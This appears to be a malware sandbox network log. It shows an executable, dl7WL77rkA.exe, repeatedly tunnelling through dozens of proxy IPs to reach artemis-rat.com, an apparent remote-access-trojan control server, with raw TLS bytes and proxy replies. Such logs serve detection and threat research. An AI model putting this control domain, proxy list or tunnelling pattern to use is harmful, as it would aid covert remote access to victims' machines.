                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.549005032 CET65INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-Agent: Zscaler/6.3
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.549556017 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ee 6c d4 82 42 c6 84 81 1a c3 35 c7 1b 98 5e 5a 8e c6 09 3d ae b7 6e f9 76 6a 8d 57 0d 90 64 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: lhelB5^Z=nvjWd*,+0/$#('=<5/artemis-rat.com#[pQED76xbwFl2-tx}xd?$8T?


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1602192.168.2.55430758.75.126.23541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.261085987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1603192.168.2.55290743.255.113.23280833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.267601013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.621151924 CET208INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Server: HCS
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 05:18:08 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 432
                                                                                                                                                                                                                                                            HCS-Error: ERR_FTP_NOT_FOUND 0
                                                                                                                                                                                                                                                            X-NGAA: MISS from CH-XW-NO1-315.3
                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1604192.168.2.554296186.124.164.213803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.270005941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1605192.168.2.554295194.247.173.1780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.271541119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1606192.168.2.554164103.166.39.1736293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.275582075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1607192.168.2.554366118.34.105.25480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.279598951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.580271959 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 718
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1608192.168.2.550148103.255.147.102833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.284347057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.405126095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.194983959 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1609192.168.2.554306212.31.100.13841533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.284621000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1610192.168.2.554468172.67.182.0803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.294425964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.450469971 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1611192.168.2.55394474.119.147.20941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.302396059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1612192.168.2.554487172.67.38.96803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.306615114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.461124897 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1613192.168.2.554336120.37.121.20990913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.307187080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.647052050 CET325INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:33 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1614192.168.2.554475162.159.242.138803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.307440042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.468494892 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1615192.168.2.55431145.11.95.16550473876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.310194969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1616192.168.2.554292103.83.36.156783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.321722984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1617192.168.2.55440443.133.74.172156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.327069998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1618192.168.2.554434121.128.194.154803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.328701973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1619192.168.2.554650152.32.132.2204433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.334276915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1620192.168.2.554651152.32.132.2204433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.336222887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1621192.168.2.554652152.32.132.2204433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.337965012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1622192.168.2.55435193.90.212.241533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.339255095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1623192.168.2.554653152.32.132.2204433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.339533091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1624192.168.2.55443791.134.140.160122173876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.341573954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.124188900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.083622932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.014653921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.905237913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.811331034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.679889917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1625192.168.2.55432565.1.244.232803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.343314886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.727849960 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.737013102 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ee 6c d4 ef fd 0b 89 b1 90 a3 59 dc 58 8e 39 b3 21 e9 a1 fa 95 7c f5 8b 48 5f e5 c1 f2 dd fc 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: lhelYX9!|H_*,+0/$#('=<5/artemis-rat.com#"j!-e8=U t6WQjOry3rhrhpg{bp%,$N
